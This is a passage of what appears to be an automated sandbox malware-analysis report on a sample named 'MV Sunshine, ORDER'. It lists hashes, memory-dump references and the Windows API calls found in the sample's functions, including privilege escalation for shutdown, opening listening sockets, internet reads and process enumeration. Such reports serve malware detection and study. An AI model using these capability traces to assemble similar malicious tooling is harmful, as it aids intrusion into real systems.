                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-1546025612
                      • Opcode ID: 3f015cfb9bf2d716467a9f60f02ce3d18e928934452fc7b8ca5ca99c162dbc75
                      • Instruction ID: 023ba210d1d8b4b148596c00677f41770845be23fe37af463d44fce71d5d35a0
                      • Opcode Fuzzy Hash: 3f015cfb9bf2d716467a9f60f02ce3d18e928934452fc7b8ca5ca99c162dbc75
                      • Instruction Fuzzy Hash: B0A27F70E0421ACBDF25CF9CC990BAEB7B5BF54314F1485AAD85AA7280D7349E82CF51
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 108029f702f66448ea600d7888c11a5f763405074f99261e481d3481301b0f81
                      • Instruction ID: d4fd0fa1b6313323728222d3208498b19eac5afe05409d22958abc71f5a8bac2
                      • Opcode Fuzzy Hash: 108029f702f66448ea600d7888c11a5f763405074f99261e481d3481301b0f81
                      • Instruction Fuzzy Hash: D0127970A00609EFDF14DFA9D985AAEB7B5FF88300F10856AE406A7251EB35AD11CB60
                      APIs
                        • Part of subcall function 009D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
                        • Part of subcall function 009D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
                        • Part of subcall function 009D8CC3: GetLastError.KERNEL32 ref: 009D8D47
                      • ExitWindowsEx.USER32(?,00000000), ref: 009E549B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: f2ea9ec758092caa727f827684205347ae2e873125beb6a5cadd03228bf43fc9
                      • Instruction ID: bf59e505c4b4cf0c5a9da8eb57888a84ff509390bda694bc32057c4c575309b5
                      • Opcode Fuzzy Hash: f2ea9ec758092caa727f827684205347ae2e873125beb6a5cadd03228bf43fc9
                      • Instruction Fuzzy Hash: D1014731694A596EF73A6776DC4ABBB725CEB04746F220421FC06E20E3FA541C818290
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009F65EF
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F65FE
                      • bind.WSOCK32(00000000,?,00000010), ref: 009F661A
                      • listen.WSOCK32(00000000,00000005), ref: 009F6629
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F6643
                      • closesocket.WSOCK32(00000000,00000000), ref: 009F6657
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: dccf73b3eb2a6f62b72f1cdb83e147f397cdad68fb28bac1bd1f6e48da4e141f
                      • Instruction ID: a93eedcec929be666d80ac8162c9c815cc87f7e9cc83fc4e9d076149dddc4e15
                      • Opcode Fuzzy Hash: dccf73b3eb2a6f62b72f1cdb83e147f397cdad68fb28bac1bd1f6e48da4e141f
                      • Instruction Fuzzy Hash: AD217E316002089FCB10EF64C989B7EB7A9EF85720F148559EA5AE73D1CB70AD06CB51
                      APIs
                        • Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
                        • Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041
                      • _memmove.LIBCMT ref: 009D062F
                      • _memmove.LIBCMT ref: 009D0744
                      • _memmove.LIBCMT ref: 009D07EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID:
                      • API String ID: 1300846289-0
                      • Opcode ID: 65f677b582c5bb8199f2f7b13fad6c7715e68ad909a64cb41c6b3fb5f5eb56b1
                      • Instruction ID: a6b47a6cf5ca1183088ffb7fa8a9cd9a27b769f0efe04e2a0ab1dd3605f3b155
                      • Opcode Fuzzy Hash: 65f677b582c5bb8199f2f7b13fad6c7715e68ad909a64cb41c6b3fb5f5eb56b1
                      • Instruction Fuzzy Hash: B5028FB0A00209DBDF04DF69D981BAEBBB5FF84300F15806AE806DB355EB35DA51CB91
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 009819FA
                      • GetSysColor.USER32(0000000F), ref: 00981A4E
                      • SetBkColor.GDI32(?,00000000), ref: 00981A61
                        • Part of subcall function 00981290: DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ColorProc$LongWindow
                      • String ID:
                      • API String ID: 3744519093-0
                      • Opcode ID: f6274b1d1daedbe0e766fcf031f1486a74adfe44a0d72e31ce0b7f4d38bacc21
                      • Instruction ID: 45d0900b2d303e1ff0a6a0b984d2c374abea05b26541faaf8c77f5f76a69f900
                      • Opcode Fuzzy Hash: f6274b1d1daedbe0e766fcf031f1486a74adfe44a0d72e31ce0b7f4d38bacc21
                      • Instruction Fuzzy Hash: 4AA15971101558FAD73CFB68ED94EBF399CDB82361B14061AF442D63E2CA598D0393B2
                      APIs
                        • Part of subcall function 009F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB
                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009F6AB1
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F6ADA
                      • bind.WSOCK32(00000000,?,00000010), ref: 009F6B13
                      • WSAGetLastError.WSOCK32(00000000), ref: 009F6B20
                      • closesocket.WSOCK32(00000000,00000000), ref: 009F6B34
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 99427753-0
                      • Opcode ID: fba32b2f481aab411187f4fe2d37adeb38f43c9f56c984135ea9c98ee829196c
                      • Instruction ID: 2d784e2b42e86fa2cb06942d88f0bcfd9488645c4f9373bdd807420e6434b5f8
                      • Opcode Fuzzy Hash: fba32b2f481aab411187f4fe2d37adeb38f43c9f56c984135ea9c98ee829196c
                      • Instruction Fuzzy Hash: 9E41C275700214AFEB10BF68DC86F7E77A89B84720F44805CFA5AAB3D2DA709D018791
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: 4fc15beed16a676875f7af1188b283c1651b3a7d593151461d8a2cfa4fad1bcb
                      • Instruction ID: f60ba9912b21a854beccf6854d4e5bf799cf4478b3f1e0ab22ca24924f0e4095
                      • Opcode Fuzzy Hash: 4fc15beed16a676875f7af1188b283c1651b3a7d593151461d8a2cfa4fad1bcb
                      • Instruction Fuzzy Hash: 1711C831B009185FD7216F76EC44B2FB79DEF84721F484429F806E7281CB329902CE95
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,009C1D88,?), ref: 009FC312
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009FC324
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: 9fcc598dd4bb3fa0f794ecb7c80201ae5d1187cd82cf81d184c4e38af255b648
                      • Instruction ID: de3f977dedcdccab347870e0f3d1d411498ad31a9452aa9ac727c69c6f4ebe62
                      • Opcode Fuzzy Hash: 9fcc598dd4bb3fa0f794ecb7c80201ae5d1187cd82cf81d184c4e38af255b648
                      • Instruction Fuzzy Hash: 3DE086B420030BDFCB348B65D904A9676D8FB09394B80C439E685D2550D7B0D441CB60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __itow__swprintf
                      • String ID:
                      • API String ID: 674341424-0
                      • Opcode ID: e0f03fe8e512f2e44f82b7d5d711c07510f9f53da24ab926252de18d738d47e0
                      • Instruction ID: f49f0b66026756bcc8aaf187cada07f09bc1e93229c12bbdb7441676417c678a
                      • Opcode Fuzzy Hash: e0f03fe8e512f2e44f82b7d5d711c07510f9f53da24ab926252de18d738d47e0
                      • Instruction Fuzzy Hash: 0E2279715083019FDB24EF68C881B6FB7E4AF88714F15891DF89A97391DB35EA04CB92
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 009FF151
                      • Process32FirstW.KERNEL32(00000000,?), ref: 009FF15F
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • Process32NextW.KERNEL32(00000000,?), ref: 009FF21F
                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 009FF22E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                      • String ID:
                      • API String ID: 2576544623-0
                      • Opcode ID: 4ce0f06bf7d54e1847a710f7f5fe39349c2f91395be6413b85220f155aa91622
                      • Instruction ID: 0810d0eda2ffba37cd49bda789e7b1d1da50d6a4e55b30861ea5739ec386a3ef
                      • Opcode Fuzzy Hash: 4ce0f06bf7d54e1847a710f7f5fe39349c2f91395be6413b85220f155aa91622
                      • Instruction Fuzzy Hash: F5517B71508304AFD310EF24DC85F6BB7E8AF94710F14492DF596972A1EB70E909CB92
                      APIs
                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009E40D1
                      • _memset.LIBCMT ref: 009E40F2
                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009E4144
                      • CloseHandle.KERNEL32(00000000), ref: 009E414D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle_memset
                      • String ID:
                      • API String ID: 1157408455-0
                      • Opcode ID: 663b20538433731f71b525e92ade84ef0084eed1476ff8b158b82957c0d5a75b
                      • Instruction ID: 0104a4ca09ff11506ae749c8e53fea699af177f8152c0569b14382663ebdc965
                      • Opcode Fuzzy Hash: 663b20538433731f71b525e92ade84ef0084eed1476ff8b158b82957c0d5a75b
                      • Instruction Fuzzy Hash: EC11A775D0122C7AD7309BA5AC4DFABBB7CEF45760F1046AAF908E7180D6744E818BA4
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009DEB19
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: d610d445a39e41849f4ca65367ee7934a2f600851b9ffec40288d7eb0a255a64
                      • Instruction ID: b8b5d2025d85aa2e28895f2c95aa8c5e3771d4b9746324bfcb5dc262642d6049
                      • Opcode Fuzzy Hash: d610d445a39e41849f4ca65367ee7934a2f600851b9ffec40288d7eb0a255a64
                      • Instruction Fuzzy Hash: 08323575A407059FDB28DF29C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB40
                      APIs
                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009F26D5
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009F270C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      • Opcode ID: 719dff584c90775f98560c7105f725afef3aaaa0a84b070d49105100b30e769d
                      • Instruction ID: 3bd46953162d0bd3411a6d1e061f44a20c848f59a1eb75e72aa39316c336f943
                      • Opcode Fuzzy Hash: 719dff584c90775f98560c7105f725afef3aaaa0a84b070d49105100b30e769d
                      • Instruction Fuzzy Hash: EB41D37160420DBFEB20EB94CC85FBBB7BCEB80728F10406AF701E6140EA75AE419765
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 009EB5AE
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009EB608
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009EB655
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: 73bc163bce1a3ad98b3a17268bc2e32b3327488f5923716cdfed91d5115b3d1a
                      • Instruction ID: 5a5dd964424dad280da5958f06136bdb17229ae1bb118acb97db51363cc22510
                      • Opcode Fuzzy Hash: 73bc163bce1a3ad98b3a17268bc2e32b3327488f5923716cdfed91d5115b3d1a
                      • Instruction Fuzzy Hash: EC214435A00518EFCB00EF95D884EEDBBB8FF88310F1480A9E945AB351DB319956CB51
                      APIs
                        • Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
                        • Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
                      • GetLastError.KERNEL32 ref: 009D8D47
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                      • String ID:
                      • API String ID: 1922334811-0
                      • Opcode ID: 25339beacf21fcbb7f9c3a10d113659566a0fabfddd0a8ee70f7ad55779dba73
                      • Instruction ID: 7fc48c2ce2b036eca6c8a2e6c21b747146adb2582fbe7d8a5f333c550507ce7c
                      • Opcode Fuzzy Hash: 25339beacf21fcbb7f9c3a10d113659566a0fabfddd0a8ee70f7ad55779dba73
                      • Instruction Fuzzy Hash: CD1191B1414209AFE728DF64DC85D6BB7BDFB44710B20C52EF85697681EB70BC418A60
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009E4C2C
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E4C43
                      • FreeSid.ADVAPI32(?), ref: 009E4C53
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      • Opcode ID: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
                      • Instruction ID: bfa0f21396ad8fa2762e787c5121134bd7c502bcbc1f01ceebb83e242e55e955
                      • Opcode Fuzzy Hash: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
                      • Instruction Fuzzy Hash: 3AF04975E1130CBFDF04DFF0DC89AAEBBBCEF08301F1044A9A901E2581E6746A058B50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f267808eeb95326b328a855d7ab098d044e85a3c9a2d2a5740aabc148c20cd90
                      • Instruction ID: 52e2d203d34e8d0c379859bacc4791c82aba8ab6acbce01c01ed4800e90239d7
                      • Opcode Fuzzy Hash: f267808eeb95326b328a855d7ab098d044e85a3c9a2d2a5740aabc148c20cd90
                      • Instruction Fuzzy Hash: 7C22AD74A04216CFDB24EF64C4A4BBEB7B4FF49300F14846AE856AB351E774AD81CB91
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 009EC966
                      • FindClose.KERNEL32(00000000), ref: 009EC996
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
